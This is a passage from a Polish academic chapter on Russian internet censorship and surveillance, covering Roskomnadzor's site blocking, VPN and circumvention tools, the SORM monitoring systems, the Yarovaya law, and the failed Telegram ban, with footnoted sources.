https://ru.wikipedia.org/wiki/Рунет
65
ekspertów początkowo odrzuciło te wysiłki jako daremne, a niektóre z nich nadal wydają
się nieskuteczne. Środki podejmowane przez Rosję wciąż są niewielkie w porównaniu z
chińską Wielką Zaporą, ale represje internetowe Kremla nabrały rozpędu.
Po inwazji Rosji na Ukrainę w lutym 2022 r., cenzura online i ściganie za
posty i komentarze w mediach społecznościowych wzrosły tak bardzo, że pobiły wszelkie
dotychczasowe rekordy.
Kontrola internetu – blokady stron
Państwo rosyjskie cenzuruje treści związane z narkotykami,
samobójstwami, hazardem i pornografią dziecięcą. Od czasu inwazji na Ukrainę w lutym
2022 r. zaczęto monitorować sieć pod kątem "fałszywych informacji o specjalnej operacji
wojskowej" (w istocie wszelkich treści, które są sprzeczne z oficjalną narracją o wojnie i
łagodnych celach Rosji na Ukrainie).
Kontrola stron internetowych realizowana jest najczęściej poprzez
blokowanie dostępu do treści rozpowszechnianych przez stronę. 1 listopada 2012
wprowadzono jeden centralny rejestr "zakazanych stron". Uzupełniają go trzy rządowe
instytucje: Roskomnadzor
3
, Federalna Agencja Antynarkotykowa i Rospotrebnadzor
(Federalna Służba Nadzoru w Sferze Praw Człowieka i Dobra Publicznego). Dostawcy
Internetu są zobowiązani zablokować dostęp do wskazanej strony w ciągu 24 godzin.
Jako przykład działań blokujących można wymienić trzy portale
informacyjne działające za granica w języku rosyjskim. Pierwszym jest estoński portal
informacyjny Postimees
4
. Z racji dużej, rosyjskojęzycznej mniejszości medium to ma
rozbudowaną wersję w języku rosyjskim. Estonia podobnie jak pozostałe państwa
bałtyckie należy do UE i NATO oraz jednoznacznie przeciwstawia się wojnie na Ukrainie.
Portal Postimees w pełni podziela stanowisko władz państwowych, sporo artykułów
dotyczy sytuacji w Rosji i wojny. W logo portalu zaszyto, na znak solidarności, barwy
flagi Ukrainy. Estoński portal skierowany jest do rosyjskojęzycznych mieszkańców
Estonii, podlega prawu Estonii i UE. Ale mimo to rosyjski regulator Federalna Służba ds.
Nadzoru w Sferze Łączności, Technologii Informacyjnych i Komunikacji Masowej
5
w
skrócie Roskomnadzor uznał, że strona nie stosuje się do rosyjskiego prawa i dostęp do
niej został zablokowany. W podobny sposób regulator potraktował wiele innych
podmiotów w tym także BBC Russian
6
. Rosyjski oddział brytyjskiego nadawcy
publicznego ma siedzibę w Rydze. W oddziale pracuje wielu dziennikarzy, którzy
wcześniej pracowali w mediach rosyjskich. Podobnie jak w przypadku wcześniej
opisywanego portalu mamy tutaj do czynienia z podmiotem nie rosyjskim, jednakże
kierującym treści do Rosjan. Prawdopodobnie z tego powodu BBC Russian przestrzega
do dzisiaj przynajmniej części rosyjskich przepisów. Co prawda wojnę nazywa wojną a
nie „Specjalną Operacją Wojskową” ale w przypadku osób mających stygmatyzujący
status „Agenta zagranicznego” lub organizacji uznanych za ekstremistyczne (taki status
3
Roskomnadzor został utworzony 12 maja 2008 r. jako służba podległa Ministerstwu Cyfryzacji. Oficjalnie
agencja ta nie jest organem ścigania. W rzeczywistości jednak Roskomnadzor stał się integralną częścią
rosyjskiego aparatu represji. Od kilku lat agencja ściśle współpracuje z organami ścigania Federacji
Rosyjskiej i administracją Kremla. Do jej zadań należy operacyjne monitorowanie artykułów, wpisów i
komentarzy w rosyjskojęzycznym Internecie, a także przygotowywanie donosów i żądań usunięcia
niepożądanych materiałów.
4
https://rus.postimees.ee/
5
https://rkn.gov.ru
6
https://www.bbc.com/russian
66
w Rosji mają np. Talibowie i Meta czyli właściciel Facebooka
7
) czy niepożądane zawsze
informuje odbiorców o tym statusie. Oczywiście działanie w zgodzie w zgodzie z
rosyjskim prawem nie pomogło nadawcy i BBC Russia także zostało zablokowane.
Trzecim najjaskrawszym przykładem blokad jest największy rosyjskojęzyczny portal
opozycyjny „Meduza”. Ten nadający z Łotwy portal w całości tworzą dziennikarze
wcześniej pracujący w mediach rosyjskich. Podobnie jak BBC mają oni bardzo dobre
kontakty w środowisku niezależnych dziennikarzy rosyjskich. „Meduza” wypracowała
pozycje lidera publikującego czytane i słuchane wiarygodne materiały. Utrzymuje się z
datków czytelników i słuchaczy. W styczniu 2023 roku Roskomnadzor wpisał „Meduzę”
na listę „organizacji niepożądanych”. Taki status oznacza znaczne utrudnienie w pracy
podmiotu. W praktyce skutkuje on nie tylko blokadą dostępu do strony na terenie Rosji.
Takie działanie zresztą opublikowano w jednolitym rejestrze zabronionych stron jeszcze
w 2022 roku
8
. Zgodnie z informacja z rejestru wszystko odbyło zgodnie z ustawą „O
informacji, technologiach informacyjnych i ochronie informacji” z 2006 roku. W sprawie
blokady, „Meduzy”, mającej status agenta zagranicznego Roskomnadzor otrzymał
postanowienia trzech sądów. Mimo tej blokady „Meduza” była nadal czytana i słuchana
oraz co więcej miała ponad 33 tysiące subskrybentów w Rosji decydujących się na
miesięczne wpłaty na rzecz portalu. Liczby osób korzystających z materiałów „Meduzy”
przytoczone na ich stronie internetowej robią wrażenie
9
. W styczniu 2023 roku na
wniosek kierującego „Grupą Wagnera” Jewgienija Prigozyna, rosyjskie ministerstwo
sprawiedliwości wpisało portal na listę „organizacji niepożądanych”. Taki wpis w
praktyce oznacza spore ryzyko, dla osób które np. linkują lub przesyłają w komunikatorze
zrzuty ekranowe materiałów publikowanych przez podmiot wpisany na listę. „Meduza”
zareagowała ulepszeniem swojej aplikacji mobilnej w taki sposób, że wprowadzono
sprawny moduł obchodzenia blokady oraz możliwość wyboru innej ikonki tak by ukryć
aplikację przed innymi osobami.
Dodatkowo tak z poziomu aplikacji jak i strony internetowej dostępne są
szczegółowe instrukcje jak obejść blokady i bezpiecznie korzystać z materiałów
„Meduzy”
10
. Jak wcześniej wspomniałem, materiały portalu można także słuchać w
formie podcastów. Jeden z najpopularniejszych nazywa się „Co się stało”. W styczniu
2023 roku, Roskomnadzor zwrócił się do Apple o usunięcie podkastu z listy dostępnych
audycji. Apple przyjęło zawiadomienie i na dwa dni wyłączyło dostęp do plików.
Jednakże po dwóch dniach blokadę zdjęto i podkast był dostępny zarówno na zachodzie
ja i w Rosji. Kolejny raz próbę zablokowania audycji podjęto w sierpniu 2023 roku, znów
była ona chwilowo skuteczna
11
. W czasie powstaje ten artykuł (listopad 2023) dostęp do
podkastów „Meduzy” i innych organizacji skupiających dziennikarzy śledczych oraz
będących oddziałami zachodnich nadawców publicznych jest w pełni możliwy.
7
https://www.bbc.com/news/technology-63218095
8
https://eais.rkn.gov.ru
9
https://support.meduza.io/en#support
10
https://docs.google.com/document/d/1X3MV7rPQp8IIdPKclGj_8O0WI1wK9_ET_FlOpw9oeT4/mobilebasic
11
https://cybernews.com/news/apple-meduza-podcast-russia/
67
Rys. 1. Ustawienia aplikacji mobilnej „Meduza”
Źródło: zrzuty ekranowe aplikacji mobilnej „Meduza”
68
Dla sprawdzenia czy strona lub adres jest zablokowany na stronie
regulatora udostępniono wyszukiwarkę. Pozwala ona na sprawdzenie statusu i podstaw
blokad.
12
Dla szybkie sprawdzenia statusu wprowadzono inne narzędzie informujące
tylko czy dana strona jest zablokowana czy też nie
13
. Takie sprawdzenia są ważne, gdyż
prawo zobowiązuje do sprawdzenia czy np. przekazywana dalej informacja nie pochodzi
od zablokowanego źródła. A takich źródeł przybywa w każdym miesiącu. Oficjalne
źródła rosyjskie mówią o blokadzie ponad 150000 stron internetowych i usunięciu
170000 materiałów zawierających „fejki o specjalnej operacji wojskowej”
14
czyli
materiałów nie odpowiadających oficjalnej narracji na temat wojny przeciwko Ukrainie.
Wśród nielegalnych publikacji wykrytych przez agencję znalazło się także 40 000
wezwań do protestu (również nielegalnych w świetle obowiązującego rosyjskiego prawa).
Według ustaleń dziennikarzy BBC Russian, Roskomnadzor nie wymaga
do blokady stron postanowień sądu a często wystarczy wniosek np. organizacji
młodzieżowej popierającej rząd lub cerkwi prawosławnej.
Rys. 2. Statystyka blokad stron internetowych w podziale na organy zlecające (2022)
Źródło: https://reestr.rublacklist.net/ru/statistics/
12
https://eais.rkn.gov.ru
13
https://blocklist.rkn.gov.ru
14
https://www.interfax-russia.ru/main/roskomnadzor-bolee-172-tys-feykov-ob-svo-zablokirovano-v-runete
69
Jak widać na powyższym zestawieniu statystycznym
15
, głównym
organem zlecającym blokadę stron jest Federalna Służba Podatkowa (FNS) ale kolejne to
Prokuratura Generalna, Moskiewski Sąd Miejski i na czwartym miejscu sam regulator –
Roskomnadzor. Bardzo ciekawa jest pozycja piąta – „госорган не указан” czyli brak
informacji o organie władzy decydującym o zablokowaniu strony. W zasadzie z każdym
miesiącem właśnie ta pozycja notuje największe przyrosty. O tym jak zmieniała się
sytuacja z blokadami w sieci w pierwszym roku wojny można przeczytać w raporcie
Open Observatory of Network Interference (OONI)
16
. W związku z niedawną, kolejną
zmianą przepisów, po 01 grudnia 2023 można oczekiwać kolejnej dużej fali blokad stron
i serwisów
17
. Tym razem będzie dotyczyła stron zawierających nawet wzmianki o
serwisach VPN i metodach obejścia blokad i zabezpieczeń
18
. Serwisy VPN zawsze
cieszyły w Rosji powodzeniem, ale szczególnie stały się popularne po zablokowaniu
dostępu do takich serwisów jak Facebook czy Instagram. Od końca 2021 roku
sukcesywnie blokowane są kolejne serwisy. Już na początku wojny, w marcu 2022 roku
zablokowano ponad 20 dostawców usług VPN. Jak wynika z ostatnich wypowiedzi
przedstawicieli władz zablokowanie wszystkich VPN planowane jest na czas po 01 marca
2024 roku
19
. Jednym z częściej wykorzystywanych narzędzi ułatwiających obejście
państwowych blokad jest „Censor Tracker”
20
czyli dodatek do przeglądarki Chrome i
Firefox.
Rys. 3. Strona tytułowa dodatku „Censor Tracker”
Źródło https://censortracker.org/
Dodatek powstał na zamówienie organizacji „Roskomswoboda”
działającej na rzecz praw i swobody w Internecie. Ich projekt „Open runet” w prosty
15
https://reestr.rublacklist.net/ru/statistics/
16
https://ooni.org/post/2023-russia-a-year-after-the-conflict/
17
https://www.dataguidance.com/news/russia-roskomnadzor-publishes-note-blocking-vpn
18
https://roskomsvoboda.org/post/nov-poln-rkn-block-vpn/
19
https://www.reuters.com/technology/russia-plans-try-block-vpn-services-2024-senator-2023-10-03/
20
https://censortracker.org/
70
sposób wyjaśnia, jak skonfigurować telefon czy komputer do pracy z zablokowanymi
stronami
21
.Organizacja prowadzi także kilka użytecznych rejestrów, w tym
zablokowanych stron
22
.
Narzędzia kontroli Internetu
Na temat narzędzi wykorzystywanych przez władze rosyjskie do kontroli
Internetu nie wiemy wiele. Głównym źródłem informacji są władze państwowe starannie
dozujące informacje i przedstawiające narzędzia i rozwiązania jako mające na celu
usprawnienie życia mieszkańców lub zwiększenie bezpieczeństwa. Drugim źródłem są
materiały dziennikarzy śledczych. Oba źródła pozwalają nam jedynie na przybliżoną
informacje na temat stosowanych narzędzi.
Historycznie najstarszym narzędziem jest SORM
23
czyli „System
Działań Operacyjno Wykrywczych”. Pierwsze modele tego rozwiązania prawdopodobnie
powstały jeszcze w czasach ZSRR i koncentrowały się na kontroli sieci telefonicznej. Za
taka teorią przemawia fakt, że podobne rozwiązania wprowadzono także innych byłych
republikach związkowych np. na Białorusi czy w Kazachstanie. Pierwsza generacja,
nazywana SORM – 1 została wprowadzona w 1995 roku. Objęła nadzorem komunikację
telefoniczną, w tym tworzące się sieci telefonii komórkowej. Wszyscy operatorzy
telefoniczni w Rosji zostali zobowiązani do instalacji oprogramowanie SORM-1 w celu
zbierania i analizy informacji z sieci telefonicznych. Od drugiej generacji – SORM-2
wprowadzonej w 1999 roku rozpoczęto kontrolę sieci internetowej. Kolejną generację
SORM -3 wprowadzono najprawdopodobniej w 2011 roku. SORM-3 gromadzi
informacje o całej komunikacji, zapewniając długoterminowe przechowywanie
wszystkich informacji i danych użytkownika, w tym bieżących zapisów i lokalizacji. W
2014 roku system został rozszerzony o media społecznościowe, a Ministerstwo
Cyfrowego Rozwoju Komunikacji i Środków Masowego Przekazu Federacji Rosyjskiej
zleciło instalację nowego sprzętu z „Deep Packet Inspection”
24
. Stało się to możliwe po
wprowadzeniu nowego prawa, które wskazywało Federalna Służbę Bezpieczeństwa jako
instytucje odpowiedzialną za nadzór nad siecią. Artykuł w gazecie „Kommersant” z dnia
21.10.2013 roku nie pozostawiał złudzeń „ФСБ хочет получить полный доступ к
данным пользователей интернета”
25
– „FSB chce otrzymać peny dostęp do danych
użytkowników sieci”. Zgodnie z projektem rozporządzenia Ministerstwa Komunikacji,
do 1 lipca 2014 r. wszyscy dostawcy Internetu musieli zainstalować w swoich sieciach
sprzęt do rejestrowania i przechowywania ruchu internetowego przez okres co najmniej
12 godzin, a służby specjalne miały otrzymać bezpośredni dostęp do tych zapisów.
Kontroli miały podlegać na przykład numery telefonów, adresy IP, nazwy kont i adresy
e-mail użytkowników portali społecznościowych.
Projekt zarządzenia, zobowiązywał dostawców Internetu do podłączenia
swoich sieci do specjalnego sprzętu, który należał do FSB. Cały ruch internetowy miał
przechodzić przez ten sprzęt, a służby specjalne otrzymały techniczną możliwość
rejestrowania wszystkich przychodzących pakietów danych i przechowywania ich przez
21
https://openrunet.org/
22
https://reestr.rublacklist.net/ru/
23
Системa оперативно-разыскных мероприятий (СОРМ)
24
Deep packet inspection” – technika sieciowa pozwalająca dostawcy usług internetowych analizować
pakiety przesyłane przez sieć pod względem ich treści
25
https://www.kommersant.ru/doc/2324684
71
co najmniej 12 godzin. W dokumencie wyszczególniono również, jakie informacje o
użytkownikach Internetu będą przekazywane przez dostawcę służbom wywiadowczym.
Obejmowało to w szczególności numer telefonu, adres IP, nazwę konta użytkownika,
adresy e-mail w mail.ru, yandex.ru, rambler.ru, gmail.com, yahoo.com itp.; unikalny
numer identyfikacyjny użytkownika czatu internetowego ICQ, międzynarodowy
identyfikator sprzętu mobilnego (IMEI), identyfikatory abonentów telefonii internetowej
dzwoniących i dzwoniących. Projekt stanowił również, że dostawcy muszą przekazywać
służbom wywiadowczym informacje o lokalizacji terminali abonenckich użytkowników
usług telefonii internetowej (Google Talk, Skype itp.). Projekt tego rozporządzenia
wywołał duże kontrowersje. Protestowali dostawcy internetu i firmy telekomunikacyjne
na które to przerzucono koszty zakupu i instalacji urządzeń. Protestowali też prawnicy
wskazując na naruszenia prawa jakie projekt niesie. FSB zapewniało, że żadnych
naruszeń praw system nie spowoduje, bo dostęp do danych będzie wymagał
postanowienia sądu. Pozostałe obawy skwitowano sformułowaniem "System jest
skierowany przeciwko przestępcom i terrorystom. Nie tylko nie zagraża praworządnym
obywatelom, ale zapewnia większe bezpieczeństwo". Oczywiście rozwiązanie wdrożono
w życie w modelu w skazanym w projekcie. Następnie dodawano nowe już niejawne
regulacje np. w 2016 roku SORM-3 dotyczące nowych sieci społecznościowych.
W 2013 roku na stronie TVN24.pl pojawił się artykuł traktujący o
kontroli internetu w Rosji
26
. Oto w jaki sposób opisywano tam działanie SORM pierwszej
generacji: „Operatorzy są zobowiązani do podłączenia swoich systemów i baz danych do
punktu zarządzania zlokalizowanego w lokalnej siedzibie FSB. Przy czym takie bazy
danych powinny mieć następujące informacje o abonentach: nazwisko, imię, imię ojca,
miejsce zamieszkania. W przypadku firmy lub instytucji, powinny tam być: nazwa
podmiotu prawnego, jego lokalizacja, spis osób korzystających z usług komunikacyjnych
w tej firmie. Baza danych powinna też zawierać informacje o kupowanych przez abonenta
usługach i płatnościach. Najbardziej zaawansowana wersja systemu, czyli SORM-3,
pozwala śledzić, na jakie strony użytkownik telefonii i internetu wchodzi, co ściąga, do
kogo dzwoni i wysyła SMS-y.
Sercem systemu są specjalne urządzenia i program (APK) zainstalowane
w centrali operatora telefonii i dostawcy internetu. Na przykład w przypadku SORM-1,
czyli systemu inwigilującego wyłącznie telekomunikację, APK "SORMowicz-E1T"
przechwytuje rozmowy, dekoduje je i przekazuje specjalnymi łączami do Punktu
Zarządzania (PU) SORM-1. Tam dane są analizowane. Punkty Zarządzania znajdują się
w lokalnych siedzibach FSB. W każdym rosyjskim mieście istnieją chronione podziemne
kable, które łączą siedzibę służby z serwerami wszystkich dostawców usług
telefonicznych i internetu w regionie. Żeby monitorować konkretną rozmowę
telefoniczną lub połączenie internetowe, oficer FSB musi tylko zasiąść przed
komputerem w centrum kontroli. Komplet oprogramowania SORM kosztuje 10-30 tys.
dolarów, a dostawców internetu i usług telefonicznych jest w Rosji ok. 5 tys. Można więc
zakładać, że tylko na zainstalowanie programu wydano już średnio ok. 100 mln dolarów.”
26
https://tvn24.pl/swiat/amerykanie-maja-prism-a-rosjanie-sorm-i-pak-tak-podsluchuja-w-panstwie-putina-
ra369335-3451402
72
Rys.4 Schemat działania SORM-1
Źródło: https://tvn24.pl/swiat/amerykanie-maja-prism-a-rosjanie-sorm-i-pak-tak-podsluchuja-w-
panstwie-putina-ra369335-3451402
W zachodnich źródłach panuje pewne zamieszanie w nazewnictwie
generacji systemu. To co powyższy artykuł z 2013 roku opisuje jako SORM 3 w
niektórych materiałach zachodnich figuruje jako druga generacja. Bez wątpienia system
ewoluował w związku z zagrożeniami jakie władze zauważały w kolejnych latach.
Według rosyjskich źródeł należy raczej mówić o ostatecznej dacie gotowości systemu,
którą wyznaczono na 32 marca 2015 roku.
27
Potrzeba ściślejszej kontroli internetu
wynikła z rosnącej roli sieci w koordynacji ruchów społecznych w wielu krajach np.
arabskich. W wielu z nich łączność za pośrednictwem mediów społecznościowych
pomagała protestującym. Na przełomie 2011 i 2012 roku w wielu miastach Rosji miały
miejsce największe protesty. Demonstrowano przeciwko sfałszowaniu wyborów. Protesty
zapewne nie byłyby tak liczne, gdyby nie sieci społecznościowe: Facebook i Vkontaktie.
W obu sieciach powstawały grupy planujące demonstracje
28
. W lutym 2014 roku miały
się odbyć Igrzyska Zimowe w Soczi, bardzo dużo mówiło się także o możliwej agresji na
Ukrainę. Stąd tez władze rosyjskie przygotowały sobie grunt pod pełniejszą kontrolę
Internetu. Opublikowane później dokumenty opisujące struktury systemów kontroli sieci
i telefonii w Soczi i w związku z Olimpiadą pokazują podobieństwo do przyszłych
rozwiązań stosowanych w całym kraju
29
Równolegle do opisywanego projektu
rozporządzenia o Sorm – 3 atakowano Facebook żądając przetwarzania danych obywateli
rosyjskich na serwerach w Rosji i monitorując powstałe nie grupy i wydarzenia. Jeśli
chodzi o Vkontaktie to w maju 2013 na krótko serwis został zablokowany
30
. Formalnym
powodem była prawdopodobna publikacja zdjęcia zaklasyfikowanego jako
pornograficzne na stronie z dziecięcą odzieżą. Na początku 2014 roku założyciel
27
https://roskomsvoboda.org/8827/
28
https://www.rferl.org/a/russian-opposition-likes-facebook/24585388.html
29
https://securityaffairs.co/27611/digital-id/new-powers-sorm-2.html
30
https://www.mk.ru/social/2013/05/24/859081-quotvkontaktequot-vnesen-v-spisok-zapreschennyih-
saytov.html
73
Vkontaktie, Paweł Durow został zmuszony do odejścia ze stanowiska osoby kierującej
portalem i niedługo po tym opuścił Rosje.
Planowane wprowadzenie nowych rozwiązań niepokoiło zarówno osoby
związane z prawami obywatelskimi jak i przedsiębiorców, na których nałożono
obowiązek instalacji końcówek systemu. Władze uspokajały, że żadnych nowych
systemów instalować nie będzie trzeba. A kwestie związane z prawami obywatelskimi
skwitowano sformułowaniem: „System jest niezbędny dla usprawnienia procesu
wykrywania najpoważniejszych przestępstw i zapobiegania aktom terrorystycznym.
Zwykli obywatele nie maja się czego obawiać”
31
. W dniu 31 lipca 2014 roku premier
Dmitrij Miedwiediew podpisał dekret rządowy nr 743, który precyzuje prawo dotyczące
blogerów: dotyczy on interakcji między służbami bezpieczeństwa a "organizatorami
rozpowszechniania informacji" - jak prawo nazywa sieci społecznościowe, fora i
wszelkie strony komunikacyjne dostępne dla wszystkich użytkowników Internetu.
Zgodnie z dekretem, strony muszą podłączyć sprzęt i oprogramowanie dla organów
ścigania zgodnie z planem działań opracowanym przez FSB. Orzeczenie zabrania
stronom internetowym ujawniania "organizacyjnych i technicznych metod działań
operacyjnych i śledczych". W dokumencie nie było wzmianki o tym, kto zapłaci za
instalację sprzętu i oprogramowania FSB na stronach internetowych. Zgodnie z tekstem
dekretu, dla każdej konkretnej witryny "szef departamentu FSB" będzie musiał wybrać
jednostkę FSB do interakcji. Ustawa federalna nr 97 "O zmianach w ustawie federalnej
"O informacji, technologiach informacyjnych i ochronie informacji" oraz niektórych
aktach ustawodawczych Federacji Rosyjskiej dotyczących uporządkowanej wymiany
informacji za pomocą sieci informacyjnych i telekomunikacyjnych" (znana jako ustawa
o blogerach), która weszła w życie 1 sierpnia, faktycznie zrównała popularne blogi z
mediami masowymi: ich autorzy nie mogą przeklinać, rozpowszechniać fałszywych
informacji ani ekstremistycznych apeli. Ustawa dotyczyła również platform, na których
blogowanie jest dozwolone, takich jak sieci społecznościowe. Ustawa o blogerach
zobowiązała takie platformy do ujawniania informacji o obecności blogerów, ich
kontaktach, przechowywania danych o działaniach ich użytkowników w Rosji przez
sześć miesięcy i udostępniania tych informacji służbom wywiadowczym
32
.
Do kolejnej zmiany przepisów doszło w lipcu 2016 roku, kiedy to Władimir
Putin podpisał dwie ustawy mające w nazwie zwalczanie terroryzmu i zapewnienie
bezpieczeństwa publicznego. Szerzej przepisy te znane są jako „Prawo Jarowej” lub
„Pakiet Jarowej”. Jedna z ustaw miała na celu wzmocnienie odpowiedzialności karnej za
przestępstwa terrorystyczne. Druga ustawa wprowadziła, jak relacjonowały media
rosyjskie „inne dodatkowe środki mające na celu zwalczanie terroryzmu”. Nowe przepisy
miały wejść w życie od 1 lipca 2018 r. a na ich mocy operatorzy telekomunikacyjni
zostali zobowiązani do przechowywania wiadomości tekstowych użytkowników usług
komunikacyjnych, informacji głosowych, obrazów, dźwięków, wideo i innych
wiadomości użytkowników na terytorium Federacji Rosyjskiej. Zgodnie z nowym
prawem „Okres takiego przechowywania może wynosić do sześciu miesięcy od
zakończenia ich odbioru, transmisji, dostawy lub przetwarzania, podczas gdy bardziej
szczegółowa procedura, warunki i zakres przechowywania zostaną ustanowione przez
rząd Federacji Rosyjskiej”.
31
https://forum.nag.ru/index.php?/topic/88815-i-esli-est-te-kto-prihodyat-k-tebe/page/6/
32
https://www.comnews.ru/content/86698
74
Podobny obowiązek zostanie nałożony na organizatorów
rozpowszechniania informacji w Internecie w odniesieniu do wiadomości
elektronicznych i danych użytkowników od tej daty. Wiadomości będą również
przechowywane przez okres do sześciu miesięcy. Ponadto tacy organizatorzy będą
zobowiązani do przekazania federalnemu organowi wykonawczemu w zakresie
zapewnienia bezpieczeństwa informacji niezbędnych do dekodowania wiadomości
elektronicznych w przypadkach, gdy użytkownicy mają możliwość dodatkowego
szyfrowania wiadomości.
Operatorzy telekomunikacyjni i organizatorzy dystrybucji informacji w
Internecie zostali również zobowiązani do przechowywania informacji o wiadomościach
użytkowników i to przez okres dłuższy niż same wiadomości. W przypadku operatorów
telekomunikacyjnych okres ten wynosi trzy lata od zakończenia odbierania, przesyłania,
dostarczania lub przetwarzania informacji, a w przypadku organizatorów
rozpowszechniania informacji w Internecie - rok od tego samego momentu
33
. Oczywiście
przepisy jedynie rozszerzyły zakres zbieranych danych powodując kolejne problemy po
stronie dostawców Internetu. Szczególnie ważne były wymagania dotyczące
deszyfrowania wiadomości i e-maili. Władze zdawały sobie sprawę z rosnącej
popularności komunikatorów. Oprócz popularnego Whatsappa w Rosji mocno wzrastała
popularność Vibera i Telegramu. Szczególnie ten drugi uchodził za bezpieczne narzędzie
komunikacji. W Moskwie pamiętano o roli Telegramu w koordynowaniu protestów w
Iranie w 2014 roku. Jako że były to początki komunikatora to władzom irańskim udało
się częściowo zablokować aplikację. W 2016 roku, Telegram miał 100 milionów
użytkowników i cały czas rósł.
Prawo Jarowej jeszcze nie weszło w życie, ale władze wymagały już jego
przestrzegania. Już we wrześniu 2017 r. FSB złożyła pozew w związku z
nieprzestrzeganiem przez Telegram ustawy jako powód podano nie przekazanie kluczy
szyfrujących w sprawie 6 osób oskarżonych o terroryzm. Według współzałożyciela
Telegramu, Pawła Durowa, nawet jeśli prośba FSB dotyczyła wyłącznie pomocy w
schwytaniu sześciu terrorystów, Telegram nie mógł jej spełnić, ponieważ numery
telefonów komórkowych, o których mowa, albo nigdy nie miały kont Telegramu, albo
ich konta zostały usunięte z powodu braku aktywności. Jednocześnie FSB zażądała
stworzenia technologii, która umożliwiłaby dostęp do korespondencji każdego
użytkownika
34
. Sprawa wywołała wielki rezonans, ale ostatecznie sąd stanął po stronie
FSB. W dniu 13 kwietnia 2018 r. Sąd Okręgowy Tagański w Moskwie orzekł o
zablokowaniu dostępu do Telegramu w Rosji z powodu niedostarczenia przez FSB kluczy
szyfrujących
35
. Zakaz został wdrożony poprzez zablokowanie ponad 19 milionów
adresów IP powiązanych z usługą, ale obejmowały one adresy Amazon Web Services i
Google Cloud Platform, ponieważ Telegram wykorzystywał tych dostawców do
kierowania wiadomości za pomocą frontowania domen. Doprowadziło to do
niezamierzonych skutków ubocznych związanych z wykorzystaniem tych platform przez
inne usługi w kraju, w tym sprzedawców detalicznych, Mastercard SecureCode i usługę
przesyłania wiadomości Tamtam firmy Mail.ru. W rezultacie użytkownicy korzystali z
sieci VPN w celu obejścia zakazu. Podczas gdy wiele niepowiązanych usług
33
https://www.garant.ru/news/782190/
34
https://www.newsru.com/hitech/26apr2018/durov.html
35
https://tass.ru/ekonomika/5129977
75
internetowych (np. strony bankowe i aplikacje mobilne) wykorzystujących treści z chmur
Google i Amazon zostało zablokowanych, rządowi nie udało się zablokować Telegramu
36
.
Telegram bardzo szybko nauczył się jak obchodzić blokady i zapewniał swoim
użytkownikom wewnętrzne narzędzia omijające blokady. Sprawa nieudanego
blokowania Telegramu dzisiaj przywoływana jest w kontekście ewentualnej blokady
Youtube, który podobnie jak Telegram powiązany jest z innymi usługami i Rosjanie nie
mogą zdecydować się taki krok. Dzień przed wyrokiem sądu rząd rosyjski wydał uchwałę
nr 445, "W sprawie zatwierdzenia zasad przechowywania przez operatorów
telekomunikacyjnych wiadomości tekstowych użytkowników usług komunikacyjnych,
informacji głosowych, obrazów, dźwięków, wideo i innych wiadomości użytkowników
usług komunikacyjnych". W której opisano dokładnie zasady i wymagania
zabezpieczenia danych i informacji przesyłanych za pośrednictwem telefonii
komórkowej jak i Internetu
37
. Wyrok otrzymał więc dodatkową podstawę prawną. Po
ponad siedmiu latach funkcjonowania prawa Jarowej, i prawie dwóch latach wojny, która
w znacznym stopniu toczy się także w cyberprzestrzeni władze rosyjskie przyznają, że
przepisy nie są przestrzegane a „tempo instalacji środków technicznych niezbędnych do
gromadzenia i przekazywania informacji agencjom wywiadowczym przez operatorów
telekomunikacyjnych pozostaje niezwykle niskie”
38
. Cytuję tu słowa przedstawiciela
FSB wypowiedziane w trakcie wystąpienia na forum poświęconym telekomunikacji w
październiku 2023 roku
39
. Głównymi przyczynami tego stanu rzeczy nazwano "obecność
na rynku znacznej liczby pozbawionych skrupułów operatorów świadczących usługi z
naruszeniem prawa", a także obecne moratorium na kontrole ich działalności. Według
FSB operatorzy telekomunikacyjni "stosują różne metody unikania odpowiedzialności,
na przykład formalnie zawierają umowy o współdziałaniu z upoważnionym organem bez
dalszego wdrażania niezbędnego sprzętu, odmawiają istniejących licencji w celu
uzyskania nowych, zmieniają podmioty prawne".
"Aby rozwiązać ten problem, FSB wraz z Ministerstwem Mediów
Cyfrowych i Roskomnadzorem regularnie wdrażają środki mające na celu zwiększenie
odpowiedzialności pozbawionych skrupułów operatorów". "Analiza praktyki sądowej
pokazuje, że podczas rozpatrywania w sądzie materiałów dotyczących przestępstw
związanych z odmową operatora wdrożenia SORM (systemu środków operacyjno-
poszukiwawczych), często podejmowana jest decyzja o nałożeniu kary w postaci
grzywny administracyjnej niższej niż minimalna kwota dla indywidualnych
przedsiębiorców lub małych i średnich przedsiębiorstw. W związku z tym nakładana jest
grzywna w wysokości od 3 do 100 tysięcy rubli" - powiedział przedstawiciel FSB
40
.
Dodał, że w takich okolicznościach operatorowi łatwiej jest zapłacić niewielkie grzywny
niż instalować drogi sprzęt. Od 1 stycznia 2024 r. zostaną wprowadzone negocjowalne
grzywny za nieprzestrzeganie tych wymogów od kwoty przychodów firmy za
świadczenie usług komunikacyjnych, ale nie mniej niż milion rubli, trwają prace nad
wyłączeniem z moratorium kontroli operatorów telekomunikacyjnych.
36
https://www.bleepingcomputer.com/news/government/russia-bans-18-million-amazon-and-google-ips-in-
attempt-to-block-telegram/
37
http://publication.pravo.gov.ru/Document/View/0001201804190032?rangeSize=1&index=1
38
https://www.comnews.ru/content/229710/2023-10-25/2023-w43/1009/fsb-nedovolny-tempami-ispolneniya-
trebovaniy-paketa-yarovoy-operatorami-svyazi
39
https://spectr-forum.com
40
Aleksander Samoiłow kieruje roboczą grupą pod nazwą „Нормативное обеспечение СОРМ на сети связи
общего пользования” https://www.rans.ru/association/wrkn-grps/46-46
76
Stanowisko przedstawiciela FSB oznacza, że władze szykują zmiany,
czyli wzmocnienie i tak już poważnej kontroli sieci. Ale SORM to nie jedyny system
kontroli Internetu. Sama kontrola nie będzie skuteczna bez narzędzi analizy informacji.
Askov, Wepr i Okullus – narzędzia analizy i monitoringu sieci
W dniu 18 listopada 2022 roku na telegramowym koncie białoruskiej
grupy hacktywistycznej „Kiberpartyzany” pojawiła się informacja o włamaniu na
serwery Roskomnadzoru i wykradzeniu ponad dwóch terabajtów danych i informacji
41
.
Cyfrowi partyzanci zapowiedzieli, że zdobyte materiały udostępnią dziennikarzom oraz
będą prowadzić swoje pogłębione „dochodzenia”
42
. Z ujawnionych dokumentów wyłania
się znacznie więcej informacji na temat metod i narzędzi jakimi władze rosyjskie chcą i
próbują kontrolować internet.
Pierwszym i najmniej znanym narzędziem okazał Askov a właściwie
„АС КОВ”
43
. W 2019 r. Roskomnadzor zlecił jednej ze swoich spółek zależnych
